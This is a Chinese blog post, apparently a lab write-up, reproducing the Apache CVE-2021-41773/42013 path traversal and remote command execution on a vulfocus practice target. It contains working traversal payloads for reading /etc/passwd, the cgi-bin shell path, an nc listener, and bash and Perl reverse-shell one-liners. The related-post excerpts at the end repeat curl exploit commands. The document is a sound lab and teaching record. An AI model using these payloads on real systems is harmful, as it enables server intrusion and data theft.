apache-CVE-2021-41773[42013]-漏洞复现

已于 2022-02-06 16:04:21 修改
阅读量3.2k 收藏
点赞数 1
分类专栏: 信息安全 文章标签: 安全 web安全 apache 目录遍历 远程命令执行
于 2022-02-05 18:10:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csd_ct/article/details/122792066
版权

apache-CVE-2021-41773[42013]

CVE-2021-41773 影响范围为2.4.49
CVE-2021-42013 影响范围为2.4.49/50

漏洞验证

41773和42013在10月份时,被暴出目录穿越和远程命令执行,虽然只影响了apache的49/50版本,但是RCE漏洞,POC已公开,还是有较强的杀伤力。为了快速验证一下该漏洞,使用vulfocus提供的在线的靶场,开启应用,如图
在这里插入图片描述

访问应用首页,可得到apche服务器版本信息,如图,
在这里插入图片描述

验证目录遍历

利用网上爆出得poc代码尝试获取/etc/passwd中得内容,poc如下,可轻松得到敏感内容

/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

在这里插入图片描述

验证远程代码执行

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

开启burp,构造远程命令执行http请求包,如图执行ls命令
在这里插入图片描述

利用反弹shell得模式,准备在反弹一个webshell完全控制该主机,如图,在公网上准备一个机器A,开启监听端口,

nc -lvvp 9999 // 监听9999端口

在这里插入图片描述

利用bash反弹shell,

bash -i >& /dev/tcp/ip/port 0>&1
***/dev/[tcp|upd]/host/port是Linux设备里面比较特殊的文件,读取或写入相当于建立socket调用***
***由于其特殊性,命令执行后依旧无法找到/dev/tcp目录更不要说下面的文件了***
***注意,这里"&"在Linux shell中表示后台运行,当然这里0>&1不是这样,对于&1更准确的说应该是文件描述符1,而1一般代表的就是STDOUT_FILENO***
*** 2>&1形式用于重定向,2>表示错误重定向,&1表示标准输出;以ls >/dev/null 2>&1为例,2>&1是将标准出错重定向到标准输出,不过在这里又被重定向到了/dev/null这个无底洞里***

竟然没有反弹成功,难道是我命令写错了吗,一直没有收到反弹过来的请求,。。。。。。,这个地方疑惑了半天,确认命令没有写错,监听机器没有错,
准备换一种反弹shell,不用bash的方式,查看了靶机上没有ping、nc、curl、wget、python等工具,是个最小的docker环境,正常的反弹都用不了啊,一筹莫展时,发现靶机上安装了perl环境,有perl也可以反弹,如下:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

啊,竟然也没有成功,虽然已经得到了flag,但为什么不能反弹shell呢?在线靶场有时间限制,准备在本地搭建实验环境验证该漏洞,尝试反弹shell,看看时哪里出错了

csd_ct
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
服务攻防-中间件安全&CVE&IIS&Apache&Tomcat&Nginx漏洞
ran的博客
05-13 2615
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
apache代码执行(cve-2021-41773)漏洞
weixin_42675091的博客
09-23 923
apache代码执行(cve-2021-41773)漏洞
[GFCTF 2021]Baby_Web的CVE-2021-41773
Aiwin的博客
06-05 1580
[GFCTF 2021]Baby_Web的CVE-2021-41773
Apache漏洞:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
最新发布
MateSnake的博客
05-29 1129
Apache漏洞:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
第六届“强网杯”青少年专项赛 writewp by 楠辞姐姐后援团
JEWSWS的博客
09-11 2491
这次比赛难度很大,Crypto部分也全都是猜谜语类型的题目,没啥游戏体验,不过好在排名在前30.本篇WP为团队WP,团队成员为:树木,AcexZe,Lenyi战队名称:楠辞姐姐后援团战队排名:24。
【路径穿越】vulfocus/apache-cve_2021_41773
wj33333的博客
11-16 273
利用网上爆出得poc代码尝试获取/etc/passwd中得内容,poc如下,可轻松得到敏感内容。查看/tmp/flag。
【安全漏洞】CVE-2021-41773和CVE-2021-42013漏洞分析
qq_53058639的博客
01-06 373
Apache HTTP Server 2.4.49版本使用的函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在../当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->,转换完成后会判断是否存在../。如果路径中存在%2e./形式,就会检测到,但是出.%2e/这种形式时,就不会检测到,原因是在遍历到第一个字符时,此时检测到后面的两个字符是%2而不是./,就不会把它当作路径穿越符处理,因此可以使用.%2e/或者%2e%2e。
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞
weixin_45260839的博客
06-03 5625
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1<Apache spark 版本 Apache Spark version>= 3.3.0 修方案 1.建议升级到安全版本,参考官网链接: ...
vulfocus——apache(cve_2021_41773)
m0_62063669的博客
09-22 992
攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞
chen5225的博客
11-01 823
CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞
Apache HTTP Server 路径穿越漏洞(CVE-2021-41773 )
qq_59975439的博客
06-10 6131
Apache HTTP Server 路径穿越漏洞(CVE-2021-41773 )
Apache远程代码执行(CVE-2021-42013)
m0_65150886的博客
12-29 420
echo;id。
Mituan-极客时间-漏洞挖掘与智能攻防实战
Aiwin的博客
10-18 1543
Mituan-极客时间-漏洞挖掘与智能攻防实战
CVE-2021-41773 - (apache 文件读取&命令执行)漏洞
三天不打上房揭瓦的博客
10-08 2776
目录漏洞描述影响版本漏洞漏洞 漏洞描述 CVE-2021-41773 漏洞是在 9 月 15 日发布的 2.4.49 版中对路径规范化所做的更改引入到 Apache HTTP Server 中的。此漏洞仅影响具有“require all denied”访问权限控制配置被禁用的Apache HTTP Server 2.4.49 版本。成功的利用将使远程攻击者能够访问易受攻击的 Web 服务器上文档根目录之外的任意文件。根据该公告,该漏洞还可能泄露“CGI 脚本等解释文件的来源”,其中可能包含攻击者可以
cve-2021-41773漏洞
06-28
### 回答1: cve-2021-41773漏洞是Apache HTTP Server中的一个安全漏洞,攻击者可以利用该漏洞在未经授权的情况下访问服务器上的文件。 要漏洞,可以按照以下步骤进行: 1. 安装Apache HTTP Server,并确保其版本为2.4.49或更早版本。 2. 创建一个名为“test”的目录,并在其中创建一个名为“test.txt”的文件。 3. 启动Apache HTTP Server,并访问以下URL:http://localhost/test/.%2e/%2e%2e/%2e%2e/%2e%2e/test.txt 4. 如果服务器返回“HTTP/1.1 200 OK”响应,则表示漏洞存在,攻击者可以访问服务器上的任何文件。 需要注意的是,该漏洞只影响Apache HTTP Server 2.4.49及更早版本,如果您使用的是更新版本的Apache HTTP Server,则不受此漏洞的影响。同时,为了保护服务器的安全,建议及时更新Apache HTTP Server的版本。 ### 回答2: cve-2021-41773漏洞是一种存在于Apache HTTP Server 2.4.49以前版本的目录遍历漏洞,攻击者可以通过构造恶意的GET请求来访问并读取目标服务器上没有授权读取权限的文件,例如 /usr/local/apache/logs/error.log。 这个漏洞非常简单,只需要使用curl或者其他工具向目标服务器发起恶意的GET请求,即可获取目标服务器上的敏感信息。 首先需要确定目标服务器上是否安装了Apache HTTP Server,并且确认目标服务器的版本是否在2.4.49以前。可以使用nmap等端口扫描工具扫描目标服务器上是否开放了HTTP服务,并尝试访问目标服务器上的默认页面,确认是否安装了Apache HTTP Server。 如果确定目标服务器上存在Apache HTTP Server,并且版本较低,则可以使用curl等工具向目标服务器发起以下恶意请求: curl -v http://<target_ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 其中,<target_ip>需要替换为目标服务器的IP地址,上述请求会尝试访问目标服务器上的/etc/passwd文件。如果能够获取到文件内容,则说明漏洞成功。 防范这个漏洞,首先需要及时升级Apache HTTP Server的版本,避免漏洞被攻击者利用。其次,可以使用Web应用程序防火墙(WAF)等安全工具来阻止滥用漏洞的请求,减少漏洞被攻击的风险。最后,建议对服务器配置进行加固,避免敏感文件被访问。 ### 回答3: cve-2021-41773漏洞是一个Apache HTTP Server的安全漏洞,可通过发送特制的HTTP请求来导致服务器上已经存在的目录结构泄露。该漏洞可能会公开网站上存在的私人和敏感信息,并为攻击者进一步攻击网站提供有关目标的有用信息。此漏洞的影响范围很广,可能影响许多版本的Apache HTTP Server。 要这个漏洞,我们需要在本地搭建一台Apache HTTP Server并设置虚拟主机。 在此之前,我们需要确保已经安装了Apache HTTP Server,如果没有安装Apache HTTP Server,可以通过以下命令在Ubuntu上安装: sudo apt-get update sudo apt-get install apache2 安装完成后,我们需要设置虚拟主机。在此例中,我们将使用名为example.com的虚拟主机。我们可以通过以下步骤进行设置: 1. 创建一个名为example.com的目录: sudo mkdir /var/www/example.com 2. 将权限设置为Apache用户: sudo chown -R www-data:www-data /var/www/example.com 3. 在我们刚创建的目录中创建一个名为index.html的文件: sudo nano /var/www/example.com/index.html 输入一些HTML代码,例如“ Hi there!” 保存并关闭文件。 4.创建一个apache虚拟主机配置文件: sudo nano /etc/apache2/sites-available/example.com.conf 在配置文件中添加以下行,以配置虚拟主机: <VirtualHost *:80> ServerAdmin webmaster@example.com DocumentRoot /var/www/example.com ServerName example.com ServerAlias www.example.com <Directory /var/www/example.com> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> 保存并关闭文件。 5. 禁用默认虚拟主机: sudo a2dissite 000-default.conf 6. 启用新虚拟主机: sudo a2ensite example.com.conf 7. 配置Apache HTTP Server: sudo service apache2 reload 在我们已经设置了虚拟主机,我们可以开始测试漏洞。我们可以使用curl发送一个特制的HTTP请求来尝试获取服务器上的文件和目录结构。如下所示: curl -v http://example.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 上面的请求意味着我们正在请求服务器上的“/etc/passwd”文件,这是一个包含用户的帐号信息的文件。执行上面命令后,我们将看到类似以下内容的响应: ... < HTTP/1.1 200 OK < Accept-Ranges: bytes < Content-Length: 266 < Connection: close < Content-Type: text/plain ... root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... ... 在上面的响应中我们可以看到给出的是服务器上的用户的帐户信息,这表明我们已经成功地利用了漏洞获取了服务器上的敏感信息。 攻击者可以进一步利用此信息对系统进行攻击。此外,在通过Apache HTTP Server公开网站的时候,最好配置适当的安全策略以确保保证系统的安全性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值